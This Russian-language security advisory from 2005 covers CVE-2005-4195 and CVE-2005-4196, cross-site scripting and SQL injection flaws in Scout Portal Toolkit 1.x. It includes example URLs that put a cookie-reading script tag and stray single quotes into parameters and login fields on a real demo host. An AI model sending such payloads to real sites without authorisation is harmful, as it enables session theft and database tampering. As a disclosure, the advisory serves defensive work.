SQL-инъекция и межсайтовый скриптинг в Scout Portal Toolkit

Дата публикации:
14.12.2005
Дата изменения:
07.05.2008
Всего просмотров:
2027
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-4195
CVE-2005-4196
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Scout Portal Toolkit 1.x
Уязвимые версии: Scout Portal Toolkit 1.x

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует при обработке входных данных в параметре “ss” сценария SPT--QuickSearch.php, в параметре ParentId сценария SPT--BrowseResources.phpи в полях формы в сценарии SPT--Advanced.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://scout.wisc.edu/Projects/SPT/demo/SPT--QuickSearch.php?
ss=<script>alert(document.cookie)</script>
http://scout.wisc.edu/Projects/SPT/demo/SPT--BrowseResources.php?
ParentId=<script>alert(document.cookie)</script>

http://scout.wisc.edu/Projects/SPT/demo/SPT--Advanced.php
Input:
<script>alert(document.cookie)</script>

2. SQL-инъекция возможна из-за недостаточной обработки входных данных в параметре ParentId сценария SPT--BrowseResources.php, а также в полях формы username и password в сценарии SPT--UserLogin.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://scout.wisc.edu/Projects/SPT/demo/SPT--BrowseResources.php?ParentId='

http://scout.wisc.edu/Projects/SPT/demo/SPT--UserLogin.php
Input username >> '
Input password >> '

URL производителя: scout.wisc.edu/Projects/SPT/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Scout Portal Toolkit Possible Sql Injection..and XSS

или введите имя

CAPTCHA